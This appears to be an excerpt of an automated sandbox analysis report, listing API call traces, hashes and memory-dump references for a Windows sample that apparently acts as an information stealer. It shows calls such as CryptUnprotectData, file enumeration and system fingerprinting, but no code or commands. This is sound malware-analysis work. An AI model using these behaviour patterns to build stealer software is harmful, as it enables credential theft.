                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                              • API String ID: 180737720-4073750446
                                                                                                                                                                                                                              • Opcode ID: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
                                                                                                                                                                                                                              • Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                              • API String ID: 1415058207-1173974218
                                                                                                                                                                                                                              • Opcode ID: f8b2ac61337480ab1d8cc55f87738a585f7c4a46595bf6ff6cbfdc8e476e5ad3
                                                                                                                                                                                                                              • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8b2ac61337480ab1d8cc55f87738a585f7c4a46595bf6ff6cbfdc8e476e5ad3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3334442632-0
                                                                                                                                                                                                                              • Opcode ID: 8fa573c4bf8f32931b9ea9eba06e67935ab5fae2b205d85bdf9771007900e629
                                                                                                                                                                                                                              • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fa573c4bf8f32931b9ea9eba06e67935ab5fae2b205d85bdf9771007900e629
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                              • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                              • Opcode ID: b3ae68a3938c9e06bcd6eabfd82ee92d7aff8f0056ccf05280facd273a8cc3fa
                                                                                                                                                                                                                              • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3ae68a3938c9e06bcd6eabfd82ee92d7aff8f0056ccf05280facd273a8cc3fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                              • API String ID: 433455689-1173974218
                                                                                                                                                                                                                              • Opcode ID: f7475b116a4597a1daddea1d9ec65d66a476fb48a19e70ace4414c8071cd6ccd
                                                                                                                                                                                                                              • Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7475b116a4597a1daddea1d9ec65d66a476fb48a19e70ace4414c8071cd6ccd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BinaryCryptString
                                                                                                                                                                                                                              • String ID: >N@
                                                                                                                                                                                                                              • API String ID: 80407269-3381801619
                                                                                                                                                                                                                              • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                              • Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
                                                                                                                                                                                                                              • Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
                                                                                                                                                                                                                              • Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(0041D599), ref: 00415D7A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                              • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                              • Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,042F6940,00000000,?,0041D758,00000000,?,00000000,00000000,?,042F74E0,00000000), ref: 004144C0
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 362916592-0
                                                                                                                                                                                                                              • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                              • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2068576380-0
                                                                                                                                                                                                                              • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                              • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00401177,042F0928,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1206570057-0
                                                                                                                                                                                                                              • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                              • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitInfoProcessSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 752954902-0
                                                                                                                                                                                                                              • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                              • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F3AA8), ref: 004072AB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004072BF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004072D3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004072E7
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6D48), ref: 004072FB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6B98), ref: 0040730F
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8470), ref: 00407322
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8350), ref: 00407336
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F3B30), ref: 0040734A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040735E
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407372
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407386
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6D48), ref: 00407399
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6B98), ref: 004073AD
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8470), ref: 004073C1
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8350), ref: 004073D4
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8180), ref: 004073E8
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004073FC
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407410
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407424
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6D48), ref: 00407438
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6B98), ref: 0040744B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8470), ref: 0040745F
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8350), ref: 00407473
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F81E8), ref: 00407486
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040749A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004074AE
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004074C2
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6D48), ref: 004074D6
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F6B98), ref: 004074EA
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8470), ref: 004074FD
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8350), ref: 00407511
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,042F8250), ref: 00407525
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407539
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040754D
